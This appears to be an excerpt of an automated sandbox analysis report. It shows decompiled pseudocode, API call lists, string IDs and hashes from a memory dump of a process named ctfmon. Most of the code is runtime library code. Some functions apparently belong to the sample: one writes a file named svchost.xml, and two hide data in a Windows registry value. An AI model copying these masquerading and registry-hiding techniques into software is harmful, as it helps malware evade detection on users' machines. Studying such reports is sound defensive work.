								goto L12;
							} else {
								_t64 = E0097404E(_t77, _t96);
								_t78 = 1;
								_v5 = 1;
								_t110 = _t64;
								if(_t110 < 0) {
									_v16 = 0;
									L18:
									_push(_t96);
									E00973020(_t91, _t96, _v12);
									goto L19;
								} else {
									if(_t110 <= 0) {
										goto L12;
									} else {
										_t65 = _a4;
										if( *_a4 == 0xe06d7363) {
											_t112 =  *0x9855dc;
											if( *0x9855dc != 0) {
												_t65 = E00983930(_t112, 0x9855dc);
												_t104 = _t104 + 4;
												if(_t65 != 0) {
													_t100 =  *0x9855dc; // 0x971e94
													L0097162B();
													_t65 =  *_t100(_a4, 1);
													_t96 = _v20;
													_t104 = _t104 + 8;
												}
											}
										}
										E0097407E(_t65, _a8, _a4);
										_t67 = _a8;
										if( *((intOrPtr*)(_t67 + 0xc)) != _t91) {
											E00974097(_t67, _t91, _t96, "/LU5/");
											_t67 = _a8;
										}
										_push(_t96);
										 *((intOrPtr*)(_t67 + 0xc)) = _t74;
										E00973020(_t91, _t96, _v12);
										E00974065();
										asm("int3");
										_push(_t96);
										_t98 = _v32;
										_push(_t91);
										_t93 = _v36;
										_t69 = GetModuleFileNameW(_v40, _t93, _t98);
										if(_t98 != 0) {
											if(_t69 == 0) {
												 *_t93 = 0;
											}
											if(_t69 == _t98) {
												_t69 = GetLastError();
												if(_t69 == 0) {
													 *(_t93 + _t98 * 2 - 2) = _t69;
												}
											}
										}
										return _t69;
									}
								}
							}
							goto L29;
							L12:
							_t91 = _t74;
							__eflags = _t74 - 0xfffffffe;
						} while (_t74 != 0xfffffffe);
						__eflags = _t78;
						if(_t78 != 0) {
							goto L18;
						}
						goto L19;
					}
				}
				L29:
			}


































                                                0x00973067
                                                0x0097306b
                                                0x0097306c
                                                0x00973073
                                                0x0097307c
                                                0x0097307e
                                                0x00973085
                                                0x00973088
                                                0x0097308b
                                                0x00973090
                                                0x00973093
                                                0x00973094
                                                0x00973099
                                                0x0097309c
                                                0x009730a3
                                                0x0097315d
                                                0x00973161
                                                0x00973170
                                                0x00000000
                                                0x00973170
                                                0x00000000
                                                0x009730a9
                                                0x009730a9
                                                0x009730af
                                                0x009730b2
                                                0x009730b5
                                                0x009730bb
                                                0x00973181
                                                0x0097318a
                                                0x009730c1
                                                0x009730c1
                                                0x009730c1
                                                0x009730c4
                                                0x009730c7
                                                0x009730ca
                                                0x009730cd
                                                0x009730d0
                                                0x009730d3
                                                0x009730d8
                                                0x00973140
                                                0x00000000
                                                0x009730da
                                                0x009730dc
                                                0x009730e1
                                                0x009730e3
                                                0x009730e6
                                                0x009730e8
                                                0x00973154
                                                0x00973175
                                                0x00973175
                                                0x00973179
                                                0x00000000
                                                0x009730ea
                                                0x009730ea
                                                0x00000000
                                                0x009730ec
                                                0x009730ec
                                                0x009730f5
                                                0x009730f7
                                                0x009730fe
                                                0x00973105
                                                0x0097310a
                                                0x0097310f
                                                0x00973111
                                                0x0097311e
                                                0x00973123
                                                0x00973125
                                                0x00973128
                                                0x00973128
                                                0x0097310f
                                                0x009730fe
                                                0x00973131
                                                0x00973136
                                                0x0097313c
                                                0x00973195
                                                0x0097319a
                                                0x0097319a
                                                0x0097319d
                                                0x009731a1
                                                0x009731a4
                                                0x009731b4
                                                0x009731b9
                                                0x009731bd
                                                0x009731be
                                                0x009731c1
                                                0x009731c2
                                                0x009731ca
                                                0x009731d2
                                                0x009731d6
                                                0x009731da
                                                0x009731da
                                                0x009731df
                                                0x009731e1
                                                0x009731e9
                                                0x009731eb
                                                0x009731eb
                                                0x009731e9
                                                0x009731df
                                                0x009731f3
                                                0x009731f3
                                                0x009730ea
                                                0x009730e8
                                                0x00000000
                                                0x00973143
                                                0x00973143
                                                0x00973145
                                                0x00973145
                                                0x0097314e
                                                0x00973150
                                                0x00000000
                                                0x00973152
                                                0x00000000
                                                0x00973150
                                                0x009730bb
                                                0x00000000

                                                APIs
                                                • _ValidateLocalCookies.LIBCMT ref: 0097308B
                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00973105
                                                  • Part of subcall function 00983930: __FindPESection.LIBCMT ref: 00983989
                                                • _ValidateLocalCookies.LIBCMT ref: 00973179
                                                • _ValidateLocalCookies.LIBCMT ref: 009731A4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: CookiesLocalValidate$CurrentFindImageNonwritableSection
                                                • String ID: /LU5/$csm
                                                • API String ID: 1685366865-1617989316
                                                • Opcode ID: e22c94505b8466088fe343b5240f81c543b185777d3e35523b25b9dcc21cf220
                                                • Instruction ID: 6eeab27b4379d537c57eddc72b7a8572588dab393c619b6872ffb27c27406dc9
                                                • Opcode Fuzzy Hash: e22c94505b8466088fe343b5240f81c543b185777d3e35523b25b9dcc21cf220
                                                • Instruction Fuzzy Hash: F841D532E04208ABCF10DF69C894A9EBBB9AF85324F14C165E81C9B352C731DB05DF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009672D0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 90fileCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 69%
                                                			E009672D0(void* __ebx, void* __ecx, void* __edx, void* __edi, intOrPtr _a4) {
				signed int _v8;
				char _v268;
				void _v102668;
				long _v102672;
				void* __esi;
				signed int _t16;
				intOrPtr _t26;
				int _t33;
				void* _t39;
				void* _t43;
				intOrPtr _t50;
				void* _t51;
				void* _t55;
				intOrPtr* _t56;
				long _t57;
				void* _t58;
				void* _t59;
				signed int _t60;

				E00983CA0();
				_t16 =  *0x98f008; // 0x35554c2f
				_v8 = _t16 ^ _t60;
				_t50 = _a4;
				_t39 = __edx;
				_t55 = __ecx;
				E00973440(_t50,  &_v268, 0, 0x104);
				E00965180( &_v268, 0x104, "%s\\svchost.xml", _t55);
				E00973440(_t50,  &_v102668, 0, 0x19000);
				_push(_t50);
				E00965180( &_v102668, 0x19000,  *0x99682c, _t39);
				_t56 =  &_v102668;
				_t43 = _t56 + 1;
				do {
					_t26 =  *_t56;
					_t56 = _t56 + 1;
				} while (_t26 != 0);
				_v102672 = 0;
				_t57 = _t56 - _t43;
				_t51 = CreateFileA( &_v268, 0x40000000, 2, 0, 2, 0x80, 0);
				if(_t51 == 0) {
					L5:
					_pop(_t58);
					return E00970A5D(_v8 ^ _t60, _t58);
				} else {
					_t33 = WriteFile(_t51,  &_v102668, _t57,  &_v102672, 0);
					_push(_t51);
					if(_t33 != 0) {
						CloseHandle();
						_pop(_t59);
						return E00970A5D(_v8 ^ _t60, _t59);
					} else {
						CloseHandle();
						goto L5;
					}
				}
			}





















                                                0x009672d8
                                                0x009672dd
                                                0x009672e4
                                                0x009672ea
                                                0x009672fb
                                                0x009672fd
                                                0x009672ff
                                                0x00967316
                                                0x00967329
                                                0x0096732e
                                                0x00967342
                                                0x00967347
                                                0x00967350
                                                0x00967353
                                                0x00967353
                                                0x00967355
                                                0x00967356
                                                0x00967372
                                                0x0096737d
                                                0x00967385
                                                0x00967389
                                                0x009673ae
                                                0x009673af
                                                0x009673c0
                                                0x0096738b
                                                0x0096739d
                                                0x009673a3
                                                0x009673a6
                                                0x009673c1
                                                0x009673cd
                                                0x009673d9
                                                0x009673a8
                                                0x009673a8
                                                0x00000000
                                                0x009673a8
                                                0x009673a6

                                                APIs
                                                • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0096737F
                                                • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0096739D
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00967878,WIN72K8R2), ref: 009673A8
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00967878,WIN72K8R2), ref: 009673C1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: CloseFileHandle$CreateWrite
                                                • String ID: %s\svchost.xml$/LU5/
                                                • API String ID: 3602564925-2125475700
                                                • Opcode ID: 02d089333694c793398d81bc73673ca1f7fc02a8dbcaae83cad49dd45c3e0a2c
                                                • Instruction ID: 1743e9200650670dd9d79ea87bb2ea46eb68822a16444248fb888a84ad90b385
                                                • Opcode Fuzzy Hash: 02d089333694c793398d81bc73673ca1f7fc02a8dbcaae83cad49dd45c3e0a2c
                                                • Instruction Fuzzy Hash: 13212C72654318BBDB20DB60DC4AFEAB37CDB85704F0040D5F948E7280CA72AAC49B61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00964CE0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69registryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00964CE0(char* _a8, intOrPtr* _a12) {
				int _v8;
				void* _v12;
				int _v16;
				void* __edi;
				int _t22;
				int _t27;
				intOrPtr* _t32;

				_v12 = 0;
				if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows NT\\CurrentVersion\\NetworkPlatform\\Location", 0, 0x20019,  &_v12) == 0) {
					_v16 = 0;
					_v8 = 0;
					if(RegQueryValueExA(_v12, "History", 0,  &_v16, 0,  &_v8) != 0) {
						goto L1;
					} else {
						_t22 = _v8;
						if(_t22 == 0) {
							goto L1;
						} else {
							_t32 = _a12;
							_t30 =  *_t32;
							if( *_t32 < _t22) {
								L8:
								return 0;
							} else {
								E00973440(_t32, _a8, 0, _t30);
								if(RegQueryValueExA(_v12, "History", 0, 0, _a8,  &_v8) != 0) {
									goto L8;
								} else {
									_t27 = _v8;
									if(_t27 == 0) {
										goto L8;
									} else {
										 *_t32 = _t27;
										RegCloseKey(_v12);
										return 1;
									}
								}
							}
						}
					}
				} else {
					L1:
					return 0;
				}
			}










                                                0x00964ce9
                                                0x00964d0a
                                                0x00964d15
                                                0x00964d22
                                                0x00964d3c
                                                0x00000000
                                                0x00964d3e
                                                0x00964d3e
                                                0x00964d43
                                                0x00000000
                                                0x00964d45
                                                0x00964d46
                                                0x00964d49
                                                0x00964d4d
                                                0x00964d93
                                                0x00964d99
                                                0x00964d4f
                                                0x00964d55
                                                0x00964d78
                                                0x00000000
                                                0x00964d7a
                                                0x00964d7a
                                                0x00964d7f
                                                0x00000000
                                                0x00964d81
                                                0x00964d84
                                                0x00964d86
                                                0x00964d92
                                                0x00964d92
                                                0x00964d7f
                                                0x00964d78
                                                0x00964d4d
                                                0x00964d43
                                                0x00964d0c
                                                0x00964d0c
                                                0x00964d11
                                                0x00964d11

                                                APIs
                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion\NetworkPlatform\Location,00000000,00020019,?), ref: 00964D02
                                                • RegQueryValueExA.ADVAPI32(00000000,History,00000000,00000000,00000000,00000800), ref: 00964D34
                                                • RegQueryValueExA.ADVAPI32(00000000,History,00000000,00000000,00000000,00000000), ref: 00964D70
                                                • RegCloseKey.ADVAPI32(00000000), ref: 00964D86
                                                Strings
                                                • History, xrefs: 00964D2C, 00964D68
                                                • Software\Microsoft\Windows NT\CurrentVersion\NetworkPlatform\Location, xrefs: 00964CF8
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: QueryValue$CloseOpen
                                                • String ID: History$Software\Microsoft\Windows NT\CurrentVersion\NetworkPlatform\Location
                                                • API String ID: 1586453840-664128107
                                                • Opcode ID: ae6eff9450d841e77eda781387503d8dba1cae759b409ed73d41282b911e4067
                                                • Instruction ID: 915f30b3fa45065646f2dc98b1cbe854af99e39348d21de5d02abbd25a2ef75e
                                                • Opcode Fuzzy Hash: ae6eff9450d841e77eda781387503d8dba1cae759b409ed73d41282b911e4067
                                                • Instruction Fuzzy Hash: 07111275B40208BBDF109F91EC46FADBBBCEB44B04F1040A5FD08E6290D771AA14EBA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00969020 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 66networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: connectgethostbynamehtonssocket
                                                • String ID: /LU5/
                                                • API String ID: 3705698054-937868281
                                                • Opcode ID: 764496f250d92c7583a73dc41e578e15c296fe9306045a1575296a5a68406659
                                                • Instruction ID: 7c667974006ca24f3e4c2fe9ee5b24687dda1567e897a3de056e0a6113e03227
                                                • Opcode Fuzzy Hash: 764496f250d92c7583a73dc41e578e15c296fe9306045a1575296a5a68406659
                                                • Instruction Fuzzy Hash: DD21B132A10609EFC711EFA8D809BAEB7B8FF95710F00416AF815AB350EB709A0497D5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00964C60 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39registryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 75%
                                                			E00964C60(char* _a8, int _a12) {
				void* _v8;
				int _v12;
				int _t11;
				long _t13;

				_v8 = 0;
				_v12 = 1;
				_t11 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows NT\\CurrentVersion\\NetworkPlatform\\Location", 0, 0, 0, 0xf003f, 0,  &_v8,  &_v12);
				if(_t11 != 0) {
					L3:
					return 0;
				} else {
					_t13 = RegSetValueExA(_v8, "History", _t11, 3, _a8, _a12);
					_push(_v8);
					if(_t13 == 0) {
						RegCloseKey();
						return 1;
					} else {
						RegCloseKey();
						goto L3;
					}
				}
			}







                                                0x00964c69
                                                0x00964c74
                                                0x00964c93
                                                0x00964c9b
                                                0x00964cc1
                                                0x00964cc6
                                                0x00964c9d
                                                0x00964cae
                                                0x00964cb4
                                                0x00964cb9
                                                0x00964cc7
                                                0x00964cd5
                                                0x00964cbb
                                                0x00964cbb
                                                0x00000000
                                                0x00964cbb
                                                0x00964cb9

                                                APIs
                                                • RegCreateKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion\NetworkPlatform\Location,00000000,00000000,00000000,000F003F,00000000,00000000,00000801), ref: 00964C93
                                                • RegSetValueExA.ADVAPI32(00000000,History,00000000,00000003,?,?), ref: 00964CAE
                                                • RegCloseKey.ADVAPI32(00000000), ref: 00964CBB
                                                • RegCloseKey.ADVAPI32(00000000), ref: 00964CC7
                                                Strings
                                                • History, xrefs: 00964CA6
                                                • Software\Microsoft\Windows NT\CurrentVersion\NetworkPlatform\Location, xrefs: 00964C89
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: Close$CreateValue
                                                • String ID: History$Software\Microsoft\Windows NT\CurrentVersion\NetworkPlatform\Location
                                                • API String ID: 1009429713-664128107
                                                • Opcode ID: f19b1c17333184092b29002450dbe26a231a5ae17e0da39ada929296c95b9d3c
                                                • Instruction ID: c1f889e04d97fba5cc2c71721a9f6273a2cbf4ef9174f2627f386fd832f7bf6f
                                                • Opcode Fuzzy Hash: f19b1c17333184092b29002450dbe26a231a5ae17e0da39ada929296c95b9d3c
                                                • Instruction Fuzzy Hash: 25F01274794608BBEF219F90ED06FA97BBCEB04705F110154BE08E5390D6B19A14BB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009765BE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,009765B3,00000002,?,00976553,00000002,0098DED8,0000000C,00976666,00000002), ref: 009765DE
                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 009765F1
                                                • FreeLibrary.KERNEL32(00000000,?,?,?,009765B3,00000002,?,00976553,00000002,0098DED8,0000000C,00976666,00000002), ref: 00976614
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: /LU5/$CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-4215288899
                                                • Opcode ID: 7841ed4af4261629ee0794faac0c46fe2e9e07802637be51de2b72c69058dd09
                                                • Instruction ID: 455af1f2a3fc2c4b6383b8ef8967b690c7b54134f4ec0ac47f77280ebc4f0b15
                                                • Opcode Fuzzy Hash: 7841ed4af4261629ee0794faac0c46fe2e9e07802637be51de2b72c69058dd09
                                                • Instruction Fuzzy Hash: 9DF0C232A18608FBCB119F90DC4DB9EBFB8EF44715F414064F809A6251CB319D44EB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00981654 Relevance: 9.3, APIs: 6, Instructions: 300COMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 77%
                                                			E00981654(signed int _a4, void* _a8, unsigned int _a12) {
				signed int _v5;
				char _v6;
				void* _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _v32;
				long _v36;
				void* _v40;
				long _v44;
				signed int* _t143;
				signed int _t145;
				intOrPtr _t149;
				signed int _t153;
				signed int _t155;
				signed char _t157;
				unsigned int _t158;
				intOrPtr _t162;
				void* _t163;
				signed int _t164;
				signed int _t167;
				long _t168;
				intOrPtr _t175;
				signed int _t176;
				intOrPtr _t178;
				signed int _t180;
				signed int _t184;
				char _t191;
				char* _t192;
				char _t199;
				char* _t200;
				signed char _t211;
				signed int _t213;
				long _t215;
				signed int _t216;
				char _t218;
				signed char _t222;
				signed int _t223;
				unsigned int _t224;
				intOrPtr _t225;
				unsigned int _t229;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed char _t236;
				signed int _t237;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t246;
				void* _t248;
				void* _t249;

				_t213 = _a4;
				if(_t213 != 0xfffffffe) {
					__eflags = _t213;
					if(_t213 < 0) {
						L58:
						_t143 = E00975D30();
						 *_t143 =  *_t143 & 0x00000000;
						__eflags =  *_t143;
						 *((intOrPtr*)(E00975D43())) = 9;
						L59:
						_t145 = E00975C10();
						goto L60;
					}
					__eflags = _t213 -  *0x996680;
					if(_t213 >=  *0x996680) {
						goto L58;
					}
					_v24 = 1;
					_t239 = _t213 >> 6;
					_t235 = (_t213 & 0x0000003f) * 0x30;
					_v20 = _t239;
					_t149 =  *((intOrPtr*)(0x996480 + _t239 * 4));
					_v28 = _t235;
					_t222 =  *((intOrPtr*)(_t235 + _t149 + 0x28));
					_v5 = _t222;
					__eflags = _t222 & 0x00000001;
					if((_t222 & 0x00000001) == 0) {
						goto L58;
					}
					_t223 = _a12;
					__eflags = _t223 - 0x7fffffff;
					if(_t223 <= 0x7fffffff) {
						__eflags = _t223;
						if(_t223 == 0) {
							L57:
							return 0;
						}
						__eflags = _v5 & 0x00000002;
						if((_v5 & 0x00000002) != 0) {
							goto L57;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							goto L6;
						}
						_t153 =  *((intOrPtr*)(_t235 + _t149 + 0x29));
						_v5 = _t153;
						_v32 =  *((intOrPtr*)(_t235 + _t149 + 0x18));
						_t246 = 0;
						_t155 = _t153 - 1;
						__eflags = _t155;
						if(_t155 == 0) {
							_t236 = _v24;
							_t157 =  !_t223;
							__eflags = _t236 & _t157;
							if((_t236 & _t157) != 0) {
								_t158 = 4;
								_t224 = _t223 >> 1;
								_v16 = _t158;
								__eflags = _t224 - _t158;
								if(_t224 >= _t158) {
									_t158 = _t224;
									_v16 = _t224;
								}
								_t246 = E00977882(_t224, _t158);
								E00977848(0);
								E00977848(0);
								_t249 = _t248 + 0xc;
								_v12 = _t246;
								__eflags = _t246;
								if(_t246 != 0) {
									_t162 = E009809B4(_t213, 0, 0, _v24);
									_t225 =  *((intOrPtr*)(0x996480 + _t239 * 4));
									_t248 = _t249 + 0x10;
									_t240 = _v28;
									 *((intOrPtr*)(_t240 + _t225 + 0x20)) = _t162;
									_t163 = _t246;
									 *(_t240 + _t225 + 0x24) = _t236;
									_t235 = _t240;
									_t223 = _v16;
									L21:
									_t241 = 0;
									_v40 = _t163;
									_t215 =  *((intOrPtr*)(0x996480 + _v20 * 4));
									_v36 = _t215;
									__eflags =  *(_t235 + _t215 + 0x28) & 0x00000048;
									_t216 = _a4;
									if(( *(_t235 + _t215 + 0x28) & 0x00000048) != 0) {
										_t218 =  *((intOrPtr*)(_t235 + _v36 + 0x2a));
										_v6 = _t218;
										__eflags = _t218 - 0xa;
										_t216 = _a4;
										if(_t218 != 0xa) {
											__eflags = _t223;
											if(_t223 != 0) {
												_t241 = _v24;
												 *_t163 = _v6;
												_t216 = _a4;
												_t232 = _t223 - 1;
												__eflags = _v5;
												_v12 = _t163 + 1;
												_v16 = _t232;
												 *((char*)(_t235 +  *((intOrPtr*)(0x996480 + _v20 * 4)) + 0x2a)) = 0xa;
												if(_v5 != 0) {
													_t191 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x996480 + _v20 * 4)) + 0x2b));
													_v6 = _t191;
													__eflags = _t191 - 0xa;
													if(_t191 != 0xa) {
														__eflags = _t232;
														if(_t232 != 0) {
															_t192 = _v12;
															_t241 = 2;
															 *_t192 = _v6;
															_t216 = _a4;
															_t233 = _t232 - 1;
															_v12 = _t192 + 1;
															_v16 = _t233;
															 *((char*)(_t235 +  *((intOrPtr*)(0x996480 + _v20 * 4)) + 0x2b)) = 0xa;
															__eflags = _v5 - _v24;
															if(_v5 == _v24) {
																_t199 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x996480 + _v20 * 4)) + 0x2c));
																_v6 = _t199;
																__eflags = _t199 - 0xa;
																if(_t199 != 0xa) {
																	__eflags = _t233;
																	if(_t233 != 0) {
																		_t200 = _v12;
																		_t241 = 3;
																		 *_t200 = _v6;
																		_t216 = _a4;
																		_t234 = _t233 - 1;
																		__eflags = _t234;
																		_v12 = _t200 + 1;
																		_v16 = _t234;
																		 *((char*)(_t235 +  *((intOrPtr*)(0x996480 + _v20 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t164 = E0097F33A(_t216);
									__eflags = _t164;
									if(_t164 == 0) {
										L41:
										_v24 = 0;
										L42:
										_t167 = ReadFile(_v32, _v12, _v16,  &_v36, 0);
										__eflags = _t167;
										if(_t167 == 0) {
											L53:
											_t168 = GetLastError();
											_t241 = 5;
											__eflags = _t168 - _t241;
											if(_t168 != _t241) {
												__eflags = _t168 - 0x6d;
												if(_t168 != 0x6d) {
													L37:
													E00975D0D(_t168);
													goto L38;
												}
												_t242 = 0;
												goto L39;
											}
											 *((intOrPtr*)(E00975D43())) = 9;
											 *(E00975D30()) = _t241;
											goto L38;
										}
										_t229 = _a12;
										__eflags = _v36 - _t229;
										if(_v36 > _t229) {
											goto L53;
										}
										_t242 = _t241 + _v36;
										__eflags = _t242;
										L45:
										_t237 = _v28;
										_t175 =  *((intOrPtr*)(0x996480 + _v20 * 4));
										__eflags =  *(_t237 + _t175 + 0x28) & 0x00000080;
										if(( *(_t237 + _t175 + 0x28) & 0x00000080) != 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v24;
												_push(_t242 >> 1);
												_push(_v40);
												_push(_t216);
												if(_v24 == 0) {
													_t176 = E009811B0();
												} else {
													_t176 = E009814C0();
												}
											} else {
												_t230 = _t229 >> 1;
												__eflags = _t229 >> 1;
												_t176 = E00981370(_t229 >> 1, _t229 >> 1, _t216, _v12, _t242, _a8, _t230);
											}
											_t242 = _t176;
										}
										goto L39;
									}
									_t231 = _v28;
									_t178 =  *((intOrPtr*)(0x996480 + _v20 * 4));
									__eflags =  *(_t231 + _t178 + 0x28) & 0x00000080;
									if(( *(_t231 + _t178 + 0x28) & 0x00000080) == 0) {
										goto L41;
									}
									_t180 = GetConsoleMode(_v32,  &_v44);
									__eflags = _t180;
									if(_t180 == 0) {
										goto L41;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L42;
									}
									_t184 = ReadConsoleW(_v32, _v12, _v16 >> 1,  &_v36, 0);
									__eflags = _t184;
									if(_t184 != 0) {
										_t229 = _a12;
										_t242 = _t241 + _v36 * 2;
										goto L45;
									}
									_t168 = GetLastError();
									goto L37;
								} else {
									 *((intOrPtr*)(E00975D43())) = 0xc;
									 *(E00975D30()) = 8;
									L38:
									_t242 = _t241 | 0xffffffff;
									__eflags = _t242;
									L39:
									E00977848(_t246);
									return _t242;
								}
							}
							L15:
							 *(E00975D30()) =  *_t206 & _t246;
							 *((intOrPtr*)(E00975D43())) = 0x16;
							E00975C10();
							goto L38;
						}
						__eflags = _t155 != 1;
						if(_t155 != 1) {
							L13:
							_t163 = _a8;
							_v16 = _t223;
							_v12 = _t163;
							goto L21;
						}
						_t211 =  !_t223;
						__eflags = _t211 & 0x00000001;
						if((_t211 & 0x00000001) == 0) {
							goto L15;
						}
						goto L13;
					}
					L6:
					 *(E00975D30()) =  *_t151 & 0x00000000;
					 *((intOrPtr*)(E00975D43())) = 0x16;
					goto L59;
				} else {
					 *(E00975D30()) =  *_t212 & 0x00000000;
					_t145 = E00975D43();
					 *_t145 = 9;
					L60:
					return _t145 | 0xffffffff;
				}
			}



























































                                                0x0098165d
                                                0x00981664
                                                0x0098167e
                                                0x00981680
                                                0x009819e8
                                                0x009819e8
                                                0x009819ed
                                                0x009819ed
                                                0x009819f5
                                                0x009819fb
                                                0x009819fb
                                                0x00000000
                                                0x009819fb
                                                0x00981686
                                                0x0098168c
                                                0x00000000
                                                0x00000000
                                                0x00981694
                                                0x009816a0
                                                0x009816a3
                                                0x009816a6
                                                0x009816a9
                                                0x009816b0
                                                0x009816b3
                                                0x009816b7
                                                0x009816ba
                                                0x009816bd
                                                0x00000000
                                                0x00000000
                                                0x009816c3
                                                0x009816c6
                                                0x009816cc
                                                0x009816e6
                                                0x009816e8
                                                0x009819e4
                                                0x00000000
                                                0x009819e4
                                                0x009816ee
                                                0x009816f2
                                                0x00000000
                                                0x00000000
                                                0x009816f8
                                                0x009816fc
                                                0x00000000
                                                0x00000000
                                                0x00981703
                                                0x00981707
                                                0x0098170a
                                                0x0098170d
                                                0x00981712
                                                0x00981712
                                                0x00981715
                                                0x00981732
                                                0x00981737
                                                0x00981739
                                                0x0098173b
                                                0x0098175b
                                                0x0098175c
                                                0x0098175e
                                                0x00981761
                                                0x00981763
                                                0x00981765
                                                0x00981767
                                                0x00981767
                                                0x00981772
                                                0x00981774
                                                0x0098177b
                                                0x00981780
                                                0x00981783
                                                0x00981786
                                                0x00981788
                                                0x009817ad
                                                0x009817b2
                                                0x009817b9
                                                0x009817bc
                                                0x009817bf
                                                0x009817c3
                                                0x009817c5
                                                0x009817c9
                                                0x009817cb
                                                0x009817ce
                                                0x009817d1
                                                0x009817d3
                                                0x009817d6
                                                0x009817dd
                                                0x009817e0
                                                0x009817e5
                                                0x009817e8
                                                0x009817f1
                                                0x009817f5
                                                0x009817f8
                                                0x009817fb
                                                0x009817fe
                                                0x00981804
                                                0x00981806
                                                0x0098180f
                                                0x00981812
                                                0x00981815
                                                0x00981818
                                                0x00981819
                                                0x0098181d
                                                0x00981823
                                                0x0098182d
                                                0x00981832
                                                0x00981842
                                                0x00981846
                                                0x00981849
                                                0x0098184b
                                                0x0098184d
                                                0x0098184f
                                                0x00981851
                                                0x00981859
                                                0x0098185a
                                                0x0098185d
                                                0x00981860
                                                0x00981861
                                                0x00981867
                                                0x00981871
                                                0x00981879
                                                0x0098187c
                                                0x00981888
                                                0x0098188c
                                                0x0098188f
                                                0x00981891
                                                0x00981893
                                                0x00981895
                                                0x00981897
                                                0x0098189f
                                                0x009818a0
                                                0x009818a3
                                                0x009818a6
                                                0x009818a6
                                                0x009818a7
                                                0x009818ad
                                                0x009818b7
                                                0x009818b7
                                                0x00981895
                                                0x00981891
                                                0x0098187c
                                                0x0098184f
                                                0x0098184b
                                                0x00981832
                                                0x00981806
                                                0x009817fe
                                                0x009818bd
                                                0x009818c3
                                                0x009818c5
                                                0x00981938
                                                0x00981938
                                                0x0098193c
                                                0x0098194c
                                                0x00981952
                                                0x00981954
                                                0x009819b0
                                                0x009819b0
                                                0x009819b8
                                                0x009819b9
                                                0x009819bb
                                                0x009819d4
                                                0x009819d7
                                                0x00981914
                                                0x00981915
                                                0x00000000
                                                0x0098191a
                                                0x009819dd
                                                0x00000000
                                                0x009819dd
                                                0x009819c2
                                                0x009819cd
                                                0x00000000
                                                0x009819cd
                                                0x00981956
                                                0x00981959
                                                0x0098195c
                                                0x00000000
                                                0x00000000
                                                0x0098195e
